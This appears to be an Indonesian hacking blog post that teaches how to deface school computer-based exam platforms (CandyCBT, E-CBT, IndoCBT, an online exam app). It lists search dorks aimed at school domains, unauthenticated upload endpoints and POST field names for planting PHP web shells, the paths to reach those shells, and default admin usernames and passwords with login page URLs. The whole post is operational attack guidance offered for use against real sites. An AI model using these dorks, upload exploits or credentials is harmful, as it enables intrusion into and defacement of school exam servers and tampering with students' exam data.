Ok Gan Kali Ini Gua Akan Share Beberapa Cara Deface Cbt Seperti Candycbt, Beesmart Cbt Dan Beberapa Lagi
Ok Yang Pertama Adalah Beesmart CBT
Cbt Ini Sudah Tidak Asing Lagi Bagi Kalian Wkwk Menurut Ku Kalian Mungkin Sudah Tahu Cara Defacenya Di Beberapa Artikel Yang Lain Wkwk Untuk Yang Ini Gua Skip Aja Soalnya Kalian Pasti Sudah Tahu :v
CandyCBT
CandyCBT Ini Gua Nemu Bugnya Di Pluginsnya Tapi Untuk V2.5 Di Cbt Ini Sudah Di Patch
Dork :
- "Support By Candy Cbt"
- candycbt + login.php
- inurl:candycbt inurl:login.php site:sch.id
Untuk Exploitnya
- /plugins/uploadfile/demo/upload.php
- /plugins/uploadfile/php/upload.php
- /plugins/uploadfile/demo/demo.html(Tidak Perlu Menggunakan Csrf Untuk Exploit Ini)
- Postfile : myfile
Note : Jika Blank Vuln
Untuk Aksesnya
- plugins/uploadfile/demo/uploads/shellkalian.php
E-CBT
Untuk Cbt Ini Dengan Admin Week Pass Atau Default Password
Dork :
- CBT E School
- intitle:Login Peserta + cbt
Untuk User Dan Pw Nya Sebagai Berikut
- User : adminutama
- Pass : admin12345
- User : admin1
- Pass : admin12345
- User : admin2
- Pass : admin12345
- User : admin3
- Pass : admin12345
Page Adminnya
http://E-CBT.sch.id/admin/login.php
Note : Jika Ingin Upload Shell Untuk CBT ini Harus Di Tamper Gan
IndoCBT
Untuk Cbt Ini Gua Udah Lama Gua Nemu Bugnya :v
Dork :
- "INDOCBT" inurl:login.php
- "Belajar Online" inurl:login.php
- INDOCBT last update :
Untuk Exploitnya Dan Postfilenya:
- /aksi/upload-file.php
- Postfile : uploadfile
- /aksi/uploadbanner.php
- Postfile: uploadfile4
Akses Shell
- http://site.info/images/shell Kalian.php
Terakhir Adalah Aplikasi Ujian Online
Nah Ini Gua Gak Tahu Ini Cbt Apa Bukan Intinya Kalo Untuk Deface Ini Dengan Admin Week Pass Sama Seperti E-CBT
Dan Untuk Pict Atau Gambarnya Seperti Ini
Dork :
- intitle:Aplikasi Ujian Online + login.php
Untuk User Dan Passnya :
- User : admin
- Pass : admin
Dan Untuk Admin Pagenya
- http://ujian.sch.id/admin/
Ok Sekian Untuk Deface Cbt Dan Untuk Dork Kalian Kembangin Sendiri Gan H3h3
Ohayo Minna ^_^
0 Komentar